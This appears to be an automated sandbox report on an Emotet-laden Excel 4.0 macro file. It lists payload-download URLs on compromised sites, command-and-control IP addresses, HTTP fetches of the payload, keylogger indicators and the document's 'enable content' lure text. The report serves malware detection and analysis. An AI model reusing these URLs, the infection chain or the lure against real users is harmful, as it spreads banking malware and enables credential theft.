Source: mshta.exe, 00000004.00000003.420844888.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439061631.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436135951.0000000002B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ode
Source: mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com=C:
Source: rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/7m
Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/cdIXMWziBmZNcwbniRwTByQMFFhNrKiB
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.p
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: weezual.fr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10012C30 _memset,connect,_strcat,send,recv, 10_2_10012C30
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/G/ HTTP/1.1Host: michaelcrompton.co.ukConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 28 Jan 2022 22:03:54 GMTcontent-type: text/html; charset=iso-8859-1content-length: 261server: Apachex-iplb-request-id: 66818F3D:C00F_D5BA2104:0050_61F4684A_0BFD:14170x-iplb-instance: 31947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000002.438237108.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421193159.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436608606.000000000029C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com{ equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.438237108.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421193159.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436608606.000000000029C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 10_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 12_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3280000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29a0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ba0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23f0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3240000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e60000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30a0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.340000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31d0000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2aa0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2720000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3000000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2330000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31a0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: opastonline.com.xls Macro extractor: Sheet: LINKO contains: mshta
Source: opastonline.com.xls Macro extractor: Sheet: LINKO contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI 23 24 25 26 27
Document contains OLE streams with names of living off the land binaries
Source: opastonline.com.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
Source: opastonline.com.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* 